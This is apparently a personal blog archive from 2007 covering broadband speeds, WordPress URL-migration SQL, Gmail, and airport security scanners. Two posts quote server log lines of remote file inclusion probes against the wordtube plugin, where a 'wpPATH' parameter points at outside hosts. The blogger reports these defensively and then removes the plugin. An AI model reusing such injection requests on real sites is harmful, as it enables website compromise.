Category Archives: blogs

others’ blogs, previous posts, etc.

my thoughts on broadband.

Current Mood:Bored emoticon Bored

What speed is really Broadband for you?

Our CPU’s are much faster year by year and all this new user generated content has to come from somewhere. Let the users be free of their upload constraints!

Here’s my semi un-formulated explanation for what I feel should be considered “broadband” today and tomarrow:

I’m quite complacent having not used dial-up in almost 10 years. My first 1.5mbps symmetrical DSL line in 1998 was great, and inexpensive. Even @Home back in the day, provided 10mbit symmetrical for a good price. Nowadays these 8mbps/512kbps cable speeds are expensive and slow. In a perfect world all internet connections would be symmetrical. In this reality upload speed should be minimally 1/4 of your download.

I have a pretty old Ethernet hub from the early 90’s, it’s a 10mbit hub. Today, a 10mbit asymmetrical internet connection should be termed Broadband for cable, and DSL customers. For those of us lucky enough to live in an area with Fiber Optics, 45mbit asymmetrical, with minimally 1/3 available for upload.

Now, in about another year or so, the port cost of 1gbit home switches should transition to where 10/100mbit switches are in price. Spending $40 to get 8ports is a deal today. The lower cost in the near future will then make it a standard on most every computer bought. There by signaling ISP’s to turn up the juice, and that the term broadband needs an upgrade to 90mbit symmetrical. and a minimum speed of 45mbit asymmetrical for transitioning providers, or about 1/4 of the available bandwidth for a 100mbit Full Duplex Ethernet. Again if your lucky enough to live near fiber, then 125-200mbit with 1/3 upload speeds.

wordtube deleted.

Current Mood:Important emoticon Important

OK, over the past week+ after updating this plugin, my site’s theme has magically changed to the Wordpress default Kubrick theme on a few occasions. I’ve decided to give wordtube the axe, I don’t need the hassle of an easily attacked plugin. Below is a quick set of statistics from May 10th, to today May 16th. Most of them were happily blocked with HTTP 403 by one of my other plugins, and .htaccess.

grep "/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=" /var/log/apache2/blog.px.ns1.net_*log|wc -l
567
grep "wordtube-button.php" /var/log/apache2/blog.px.ns1.net_*log |wc -l
577
grep libwww-perl /var/log/apache2/blog.px.ns1.net_*log|wc -l
588
grep "wordtube-button.php" /var/log/apache2/blog.px.ns1.net_*log |grep -v 403|wc -l
11  # 6 of these were my own accesses.

Now I just need to checkout my system for any tertiary issues. *sigh*

wordtube?

Current Mood:Confused emoticon Confused

I saw something interesting in my apache log.

blog.px.ns1.net 72.36.146.234 server.webbyte.com - - [06/May/2007:18:51:22 -0700] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.pikspiller.dk/stats/format/status.txt? HTTP/1.1" 200 962 "-" "libwww-perl/5.805" mod_deflate: In:- Out:-:-pct.

the file status.txt isn’t malicious, just an echo.

< ? echo "1122548"; ?>


UPDATE
it happened again. with a different host/file this time. Time to toss this plugin??

blog.px.ns1.net 85.119.156.52 power-network.org - - [07/May/2007:23:34:28 -0700] "GET //wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://sanwall.info/echo.txt? HTTP/1.1" 200 922 "-" "libwww-perl/5.803" mod_deflate: In:- Out:-:-pct.

UPDATE2
yeah, there just found an advisory to update to a newer version.

test post

test post

boredom

test

Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl

wordpress url change mysql code

I changed the url of my blog again recently here is some helpful mysql code to renaming a wordpress blog url. YMMV. You’ll need to find all the other fields which containd the old information. I’d like this to be a plugin, it’s more or less a set of simple database commands, but for now cut and paste code will work ok.

 
UPDATE `wp_postmeta` SET `meta_value` = REPLACE(`meta_value`,'blog.blog.px.ns1.net','blog.px.ns1.net');# MySQL returned an empty result set (i.e. zero rows).
 
UPDATE `wp_comments` SET `comment_author_url` = REPLACE(`comment_author_url`,'blog.blog.px.ns1.net','blog.px.ns1.net');# MySQL returned an empty result set (i.e. zero rows).
 
UPDATE `wp_options` SET `option_value` = REPLACE(`option_value`,'blog.blog.px.ns1.net','blog.px.ns1.net');# MySQL returned an empty result set (i.e. zero rows).
 
UPDATE `wp_posts` SET `post_content` = REPLACE(`post_content`,'https://px.ns1.net','http://blog.px.ns1.net:81');
 
UPDATE `wp_posts` SET `post_content` = REPLACE(`post_content`,'http://px.ns1.net:81','http://blog.px.ns1.net:81');
UPDATE `wp_posts` SET `post_content` = REPLACE(`post_content`,'/wordpress','/');
UPDATE `wp_posts` SET `post_content` = REPLACE(`post_content`,':81//',':81/');
UPDATE `wp_xspf_player` SET `url` = REPLACE(`url`,'https://px.ns1.net','http://blog.px.ns1.net:81');
 
UPDATE `wp_posts` SET `guid` = REPLACE(`guid`,'https://px.ns1.net/','http://blog.px.ns1.net:81/');
 
UPDATE `wp_posts` SET `guid` = REPLACE(`guid`,'http://px.ns1.net:81/','http://blog.px.ns1.net:81/');
 
UPDATE `wp_posts` SET `guid` = REPLACE(`guid`,'/wordpress/wordpress/','/');
UPDATE `wp_posts` SET `post_content` = REPLACE(`post_content`,"[php]","<pre lang=\"php\">");
 
 UPDATE `wp_posts` SET `post_content` = REPLACE(`post_content`,"[/php]","</pre>");

update:

UPDATE `wp_posts` SET `post_content` = REPLACE(`post_content`,'/wordpress/wordpress/','/');
UPDATE `wp_posts` SET `post_content` = REPLACE(`post_content`,'/wordpress/','/');
UPDATE `wp_posts` SET `post_content` = REPLACE(`post_content`,'http://px.ns1.net:81/','http://blog.px.ns1.net/');
UPDATE `wp_posts` SET `post_content` = REPLACE(`post_content`,'http://blog.px.ns1.net:81/','http://blog.px.ns1.net/');
UPDATE `wp_posts` SET `pinged` = REPLACE(`pinged`,'ns1.net/wordpress/','ns1.net/');
UPDATE `wp_posts` SET `pinged` = REPLACE(`pinged`,'http://px.ns1.net:81/','http://blog.px.ns1.net/');
UPDATE `wp_posts` SET `pinged` = REPLACE(`pinged`,'/wordpress/wordpress/','/');
 
UPDATE `wp_posts` SET `guid` = REPLACE(`guid`,'http://blog.px.ns1.net:81/','http://blog.px.ns1.net/');
 
UPDATE `wp_postmeta` SET `meta_value` = REPLACE(`meta_value`,'http://px.ns1.net:81/','http://blog.px.ns1.net/');
UPDATE `wp_postmeta` SET `meta_value` = REPLACE(`meta_value`,'http://blog.px.ns1.net:81//','http://blog.px.ns1.net/');
UPDATE `wp_postmeta` SET `meta_value` = REPLACE(`meta_value`,'http://blog.px.ns1.net:81/','http://blog.px.ns1.net/');
UPDATE `wp_postmeta` SET `meta_value` = REPLACE(`meta_value`,'/wordpress','/');
 
UPDATE `wp_options` SET `option_value` = REPLACE(`option_value`,':81','');

HOW’S MY BLOGGING?

bloggersticker.gif

[via]

test post

just a test post, seeing if cross posting is working.
this is only a test

test post for commenting

this is a test post for commenting.

here to test the ability to post comments using openid, anonymous posting, and authenticated users.

advertising dollars and security

I hate to be critical but, Om Malik seems to think Google cares that you use their encumbered interface to view your mail.

How about making GMail available over IMAP? Oh wait, that is going to cut into the money Google makes from advertising…never mind.

You can already get your email without using the encumbered interface and Ads, via their POP Download.Although if they supported IMAP things would be very nice. Also if you really don’t want to view their ads use the CustomizeGoogle Firefox plugin.

A great feature I really like is being able to use Gmail to send email with any address of mine securely.
My mail provider effectively doesn’t have Secure SMTP because Cox blocks outgoing TCP port 25, and sadly my provider also doesn’t use a secondary secure mail port.

I use Gmail for two purposes really.
A “junk box” which I use to signup for things and automatically forward to my regular IMAP account.
Send email securely with TLS, since both my ISP and mail provider refuse to play nicely. (I’ve pretty much accepted that it’s a good thing Cox blocks tcp/25, otherwise the internet traffic would be 80% spam from many more zombies)

At least I can use the power of Google to search through all the mail I’ve sent.

Oh Look, it’s my Junk!

It looks like the next time I go through PHX on my way to SNA, which should be very soon hopefully, I may get scanned by a new fangled dangled device at our airports; Controversial X-ray. [via] Vision

The agency is expected to provide more information about the technology at an official unveiling later this month. For now, the agency will say only that one machine will be up and running at Sky Harbor’s Terminal 4 by Christmas.

My trips through PHX usually start at Terminal 2, then off to Terminal 4, on my way to Orange County.

After arriving at,a gate on the far end of, Terminal 4, a Skycap will push me down the causeway, out through security an onto the Bus loading area. Most of the time I end up waiting here by myself, as the Skycaps do not go between the terminals. From here, I wait about 3-10 minutes for a bus.
This older terminal, in the desert, doesn’t have any real shade the last time I went through in the dead of summer, and it was about 100 degrees F. So after wrangling my stuff into the bus, a quick trip through around the airport brings me to Terminal 4.

I generally have a long walk ahead of me, about 1/4 mile depending on where the bus will drop me off. By the time I get to the US Airways ticket counter, I am usually about ready to collapse. Why in this day of age am I at the ticket counter? Well, SCIF doesn’t buy E-tickets, unless they _have_ too. Once I have my tickets in hand, I get to find another Skycap to push me the next 1/4 mile or longer journey to Security where the only good thing is being pushed through the line of people 120 deep.

I hate going through security.

The first thing I do is unpack my gear. Laptop, Video camera. All this stuff has to go into about 2 bins. Then off with the shoes, and support brace, which goes into a 3rd bin, where my cane is to follow. I can’t wear my low back support brace without somehow seeming suspicious. I then get handed a cheap plastic cane to go through the detector. If I’m lucky I won’t beep, or be Selective Service marked, because then I get the full once over; ( pat down, air jet puffed bomb sniffer, metal detector, or even now some TSA official can possibly see me nude with a special scanner?)

The security agency’s Web site indicates that the technology will be used initially as a secondary screening measure, meaning that only those passengers who first fail the standard screening process will be directed to the X-ray area.

Even then, passengers will have the option of choosing the backscatter or a traditional pat-down search.

I have a choice now;
I can choose to have somewhat naked pictures of me on a television screen, where some TSA person can peep on my junk, using some Backscatter X-Ray Technology.

Or;
I can get a nice painful pat down, which I do alert the TSA agent that I am in pain before starting. My back, legs, arms, and neck are quite sensitive to touch after being packed like a tuna. Only if the TSA person is being nice will I actually be allowed to use a cane to balance myself.

Going home through the airport is just as bad. The bus drops nowhere near the Great Lakes ticket counter, and then I have to wait sitting on the ground, for a Skycap. In Terminal 2 there aren’t benches around to sit down. WTF?

The trip through security is the same as before. Last time thanks to US Air, and a retiring pilot, I was made very very late for my next flight almost becoming stranded. Due to my late arrival I of course now had to be extra screened, which made it the last 2 times in that direction. The other times I guess is because I’m only 1 of maybe 5 passengers on the flight back to FHU.

I can’t win, I hate traveling.

The new X-ray machine will be in Terminal 4, which serves US Airways and Southwest Airlines, and handles nearly 80 percent of the airport’s passenger traffic. The security agency is already testing another anti-terrorism tool there called the Explosive Detection Trace Portal.

That machine, commonly known as a “puffer,” is also designed to screen people for explosives without pat-downs. It works by releasing several puffs of air on the passenger, and then analyzing dislodged particles from the person’s clothing for explosive residue.

TSA Backscatter Privacy Page

[update] Of course to see the demo video you have to be using Windows Media. Thanks, really, I wanted to see it, but I can’t seem to view them with my free operating system. Hey TSA, would it have been that difficult to use an open format?

meme measurements

This guy is attempting to measure the speed of meme. I’ll link for a trackback. :)

[via mefi]

Bad Behavior has blocked 1355 access attempts in the last 7 days.